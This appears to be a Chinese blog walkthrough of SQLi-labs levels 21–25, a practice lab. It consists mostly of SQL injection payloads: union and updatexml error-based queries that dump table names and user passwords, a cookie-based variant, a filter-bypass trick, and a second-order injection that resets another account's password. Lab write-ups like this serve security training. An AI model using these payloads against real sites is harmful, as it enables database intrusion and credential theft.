Sqli-labs-master的21—25通关教程

目录

Less-21('闭合)

查询数据库名

查询数据库中的表

查询表中字段名

查询表中数据

Less-22("闭合)

查询数据库名

查询数据库中的表

查询表中字段名

查询表中数据

Less-23

查询数据库名

查询数据库中的表

查询表中字段名

查询表中数据

Less-24(二次注入)

Less-25

查询数据库名

查询数据库中的表

查询表中字段名

查询表中数据


Less-21('闭合)

登录成功后发现cookie可以显示出来,但是是乱码

登录成功后显示的页面中cookie是一串看不懂的字符, 看了后端代码后发现,是因为这里被编码过了, 那么抓包后修改cookie的值并进行 base64 编码

查询数据库名

') union select 1,2,database() #

查询数据库中的表

') and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) #

查询表中字段名

') and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e),1) #

查询表中数据

') and updatexml(1,concat(0x7e,(select group_concat(username,0x7e,password) from users),0x7e),1) #

Less-22("闭合)

查询数据库名

" union select 1,2,database() #

查询数据库中的表

" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) #

查询表中字段名

" and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e),1) #

查询表中数据

" and updatexml(1,concat(0x7e,(select group_concat(username,0x7e,password) from users),0x7e),1) #

Less-23

直接在 URL 后面构造语句

查询数据库名

-1' union select 1,database(),3 and '1' = '1

查询数据库中的表

-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 or '1'='1

查询表中字段名

-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3 or '1'='1

查询表中数据

-1' union select 1,(select group_concat(username,0x7e,password) from users),3 or '1'='1

Less-24(二次注入)

注册一个用户名 a 密码 123123 的用户

登录发现登录成功

查询数据库中的表的内容发现写入进去了

注册一个 a'# 的账户

登录上去用错误的密码修改

发现修改成功,用修改后的密码登录,发现登录成功

说明二次注入成功

Less-25

查询数据库名

-2' union select 1,2,database() --+

查询数据库中的表

-2' union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema='security' --+

查询表中字段名

-2' union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_schema='security' aandnd table_name='users' --+

查询表中数据

-1'union select 1,group_concat(username,0x3a,passwoorrd),3 from users --+

  • 7
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值